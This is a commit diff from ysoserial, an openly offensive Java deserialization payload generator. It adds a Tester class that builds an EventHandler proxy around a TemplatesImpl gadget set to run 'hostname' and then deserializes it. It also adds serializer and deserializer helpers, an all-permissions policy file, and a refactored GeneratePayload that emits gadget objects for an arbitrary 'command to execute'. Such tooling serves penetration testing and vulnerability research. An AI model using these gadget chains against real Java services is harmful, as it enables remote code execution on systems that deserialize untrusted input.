jre7u21 gadget chain, refactors

yolosec · Jan 27, 2016 · 0e99a19 · 0e99a19
1 parent 4f00182
commit 0e99a19
Show file tree

Hide file tree

Showing 26 changed files with 994 additions and 333 deletions.
diff --git a/all.policy b/all.policy
@@ -0,0 +1,3 @@
+grant {
+	permission java.security.AllPermission;
+};
diff --git a/pom.xml b/pom.xml
@@ -4,7 +4,7 @@
 
 	<groupId>ysoserial</groupId>
 	<artifactId>ysoserial</artifactId>
-	<version>0.0.2-SNAPSHOT</version>
+	<version>0.0.3-SNAPSHOT</version>
 	<packaging>jar</packaging>
 
 	<name>ysoserial</name>
@@ -22,15 +22,15 @@
 				<version>3.2</version>
 				<configuration>
 					<source>1.5</source>
-					<target>1.5</target><!-- maximize compatibility -->					
+					<target>1.5</target><!-- maximize compatibility -->
 				</configuration>
 			</plugin>
 			<plugin>
 				<artifactId>maven-assembly-plugin</artifactId>
 				<configuration>
 				    <finalName>${project.artifactId}-${project.version}-all</finalName>
-					<appendAssemblyId>false</appendAssemblyId>				    				
-					<archive>					
+					<appendAssemblyId>false</appendAssemblyId>
+					<archive>
 						<manifest>
 							<mainClass>ysoserial.GeneratePayload</mainClass>
 						</manifest>
@@ -53,7 +53,7 @@
 	</build>
 
 	<dependencies>
-	
+
 		<!-- testing depedencies -->
 
 		<dependency>
@@ -93,7 +93,7 @@
 			<artifactId>javassist</artifactId>
 			<version>3.19.0-GA</version>
 		</dependency>
-		
+
 		<!-- gadget dependecies -->
 
 		<dependency>
@@ -105,7 +105,7 @@
 			<groupId>org.apache.commons</groupId>
 			<artifactId>commons-collections4</artifactId>
 			<version>4.0</version>
-		</dependency>		
+		</dependency>
 		<dependency>
 			<groupId>org.apache.commons</groupId>
 			<artifactId>commons-lang3</artifactId>

diff --git a/src/main/java/Tester.java b/src/main/java/Tester.java
@@ -0,0 +1,97 @@
+import java.beans.EventHandler;
+import java.io.Serializable;
+import java.lang.reflect.Constructor;
+import java.lang.reflect.Field;
+
+import javassist.util.proxy.ProxyFactory;
+
+import javax.xml.transform.Templates;
+
+import sun.misc.Unsafe;
+import ysoserial.Deserializer;
+import ysoserial.Serializer;
+import ysoserial.payloads.util.Gadgets;
+
+
+public class Tester {
+	public static class Foo {
+		public boolean value() {
+			System.out.println("called");
+			return true;
+		}
+	}
+
+	public static void main(String[] args) throws Exception {
+
+//		Transient t = Gadgets.createProxy((InvocationHandler) Reflections.getFirstCtor(Gadgets.ANN_INV_HANDLER_CLASS).newInstance(Transient.class, new HashMap()), Transient.class);
+//
+//		t.equals(new Foo());
+
+
+		ProxyFactory pf2 = new ProxyFactory();
+		ProxyFactory pf = new ProxyFactory();
+
+		pf.setInterfaces(new Class[]{ Serializable.class });
+		pf.setSuperclass(EventHandler.class);
+		pf.setUseWriteReplace(true);
+		pf.setUseCache(false);
+
+		//     public EventHandler(Object target, String action, String eventPropertyName, String listenerMethodName) {
+
+
+		Templates t = Gadgets.createTemplatesImpl("hostname");
+
+		Class c = pf.createClass();
+
+		Constructor ctor = c.getConstructors()[0];
+		ctor.setAccessible(true);
+
+		Object o = ctor.newInstance(t, "getOutputProperties", null, null);
+
+
+		//Object o = getUnsafe().allocateInstance(c);
+
+		//Object o = c.newInstance();
+
+//		System.out.println(pf);
+//		System.out.println(pf.hashCode());
+//		System.out.println(c);
+		System.out.println(c.getName());
+		System.out.println(o.getClass().getName());
+//		System.out.println(o);
+//		System.out.println(Arrays.asList(c.getInterfaces()));
+
+		byte[] serialized = Serializer.serialize(o);
+//
+////		System.out.write(serialized);
+//
+		try {
+			Object o2 = Deserializer.deserialize(serialized);
+			//System.out.println(o2);
+			System.out.println(o2.getClass());
+			System.out.println(o2.getClass().getName());
+
+			o2 = Deserializer.deserialize(serialized);
+			System.out.println(o2.getClass());
+			System.out.println(o2.getClass().getName());
+
+			o2 = Deserializer.deserialize(serialized);
+			System.out.println(o2.getClass());
+			System.out.println(o2.getClass().getName());
+		} catch (Exception e) {
+			e.printStackTrace();
+		}
+
+
+		getUnsafe().allocateInstance(Class.class);
+
+	}
+
+	public static Unsafe getUnsafe() {
+	    try {
+	            Field f = Unsafe.class.getDeclaredField("theUnsafe");
+	            f.setAccessible(true);
+	            return (Unsafe)f.get(null);
+	    } catch (Exception e) { throw new RuntimeException(e); }
+	}
+}
diff --git a/src/main/java/ysoserial/Deserialize.java b/src/main/java/ysoserial/Deserialize.java
diff --git a/src/main/java/ysoserial/Deserializer.java b/src/main/java/ysoserial/Deserializer.java
@@ -0,0 +1,34 @@
+package ysoserial;
+
+import java.io.ByteArrayInputStream;
+import java.io.File;
+import java.io.FileInputStream;
+import java.io.IOException;
+import java.io.InputStream;
+import java.io.ObjectInputStream;
+import java.util.concurrent.Callable;
+
+public class Deserializer implements Callable<Object> {
+	private final byte[] bytes;
+
+	public Deserializer(byte[] bytes) { this.bytes = bytes; }
+
+	public Object call() throws Exception {
+		return deserialize(bytes);
+	}
+
+	public static Object deserialize(final byte[] serialized) throws IOException, ClassNotFoundException {
+		final ByteArrayInputStream in = new ByteArrayInputStream(serialized);
+		return deserialize(in);
+	}
+
+	public static Object deserialize(final InputStream in) throws ClassNotFoundException, IOException {
+		final ObjectInputStream objIn = new ObjectInputStream(in);
+		return objIn.readObject();
+	}
+
+	public static void main(String[] args) throws ClassNotFoundException, IOException {
+		final InputStream in = args.length == 0 ? System.in : new FileInputStream(new File(args[0]));
+		Object object = deserialize(in);
+	}
+}
diff --git a/src/main/java/ysoserial/ExecBlockingSecurityManager.java b/src/main/java/ysoserial/ExecBlockingSecurityManager.java
diff --git a/src/main/java/ysoserial/GeneratePayload.java b/src/main/java/ysoserial/GeneratePayload.java
@@ -1,16 +1,15 @@
 package ysoserial;
 
-import java.io.ObjectOutputStream;
+import java.io.PrintStream;
 import java.util.ArrayList;
-import java.util.Collection;
+import java.util.Arrays;
 import java.util.Collections;
 import java.util.Comparator;
 import java.util.List;
-import java.util.Set;
-
-import org.reflections.Reflections;
 
 import ysoserial.payloads.ObjectPayload;
+import ysoserial.payloads.ObjectPayload.Utils;
+import ysoserial.payloads.annotation.Dependencies;
 
 @SuppressWarnings("rawtypes")
 public class GeneratePayload {
@@ -25,62 +24,41 @@ public static void main(final String[] args) {
 		}
 		final String payloadType = args[0];
 		final String command = args[1];
-		
-		final Class<? extends ObjectPayload> payloadClass = getPayloadClass(payloadType);
-		if (payloadClass == null || !ObjectPayload.class.isAssignableFrom(payloadClass)) {
+
+		final Class<? extends ObjectPayload> payloadClass = Utils.getPayloadClass(payloadType);
+		if (payloadClass == null) {
 			System.err.println("Invalid payload type '" + payloadType + "'");
 			printUsage();
 			System.exit(USAGE_CODE);
 		}
-		
+
 		try {
 			final ObjectPayload payload = payloadClass.newInstance();
 			final Object object = payload.getObject(command);
-			final ObjectOutputStream objOut = new ObjectOutputStream(System.out);
-			objOut.writeObject(object);
+			PrintStream out = System.out;
+			Serializer.serialize(object, out);
 		} catch (Throwable e) {
 			System.err.println("Error while generating or serializing payload");
 			e.printStackTrace();
 			System.exit(INTERNAL_ERROR_CODE);
-		}		
-		System.exit(0);		
-	}
-
-	@SuppressWarnings("unchecked")
-	private static Class<? extends ObjectPayload> getPayloadClass(final String className) {
-		try {
-			return (Class<? extends ObjectPayload>) Class.forName(className);				
-		} catch (Exception e1) {		
 		}
-		try {
-			return (Class<? extends ObjectPayload>) Class.forName(GeneratePayload.class.getPackage().getName() 
-				+ ".payloads."  + className);
-		} catch (Exception e2) {				
-		}			
-		return null;		
+		System.exit(0);
 	}
-	
+
 	private static void printUsage() {
 		System.err.println("Y SO SERIAL?");
 		System.err.println("Usage: java -jar ysoserial-[version]-all.jar [payload type] '[command to execute]'");
-		System.err.println("\tAvailable payload types:");	
-		final List<Class<? extends ObjectPayload>> payloadClasses = 
-			new ArrayList<Class<? extends ObjectPayload>>(getPayloadClasses());
+		System.err.println("\tAvailable payload types:");
+		final List<Class<? extends ObjectPayload>> payloadClasses =
+			new ArrayList<Class<? extends ObjectPayload>>(ObjectPayload.Utils.getPayloadClasses());
 		Collections.sort(payloadClasses, new ToStringComparator()); // alphabetize
 		for (Class<? extends ObjectPayload> payloadClass : payloadClasses) {
-			System.err.println("\t\t" + payloadClass.getSimpleName());
+			System.err.println("\t\t" + payloadClass.getSimpleName() + " " + Arrays.asList(Dependencies.Utils.getDependencies(payloadClass)));
 		}
 	}
-
-	// get payload classes by classpath scanning
-	private static Collection<Class<? extends ObjectPayload>> getPayloadClasses() {
-		final Reflections reflections = new Reflections(GeneratePayload.class.getPackage().getName());
-		final Set<Class<? extends ObjectPayload>> payloadTypes = reflections.getSubTypesOf(ObjectPayload.class);		
-		return payloadTypes;
-	}	
 
 	public static class ToStringComparator implements Comparator<Object> {
 		public int compare(Object o1, Object o2) { return o1.toString().compareTo(o2.toString()); }
-	}	
+	}
 
 }
diff --git a/src/main/java/ysoserial/Serializer.java b/src/main/java/ysoserial/Serializer.java
@@ -0,0 +1,30 @@
+package ysoserial;
+
+import java.io.ByteArrayOutputStream;
+import java.io.IOException;
+import java.io.ObjectOutputStream;
+import java.io.OutputStream;
+import java.util.concurrent.Callable;
+
+public class Serializer implements Callable<byte[]> {
+	private final Object object;
+	public Serializer(Object object) {
+		this.object = object;
+	}
+
+	public byte[] call() throws Exception {
+		return serialize(object);
+	}
+
+	public static byte[] serialize(final Object obj) throws IOException {
+		final ByteArrayOutputStream out = new ByteArrayOutputStream();
+		serialize(obj, out);
+		return out.toByteArray();
+	}
+
+	public static void serialize(final Object obj, final OutputStream out) throws IOException {
+		final ObjectOutputStream objOut = new ObjectOutputStream(out);
+		objOut.writeObject(obj);
+	}
+
+}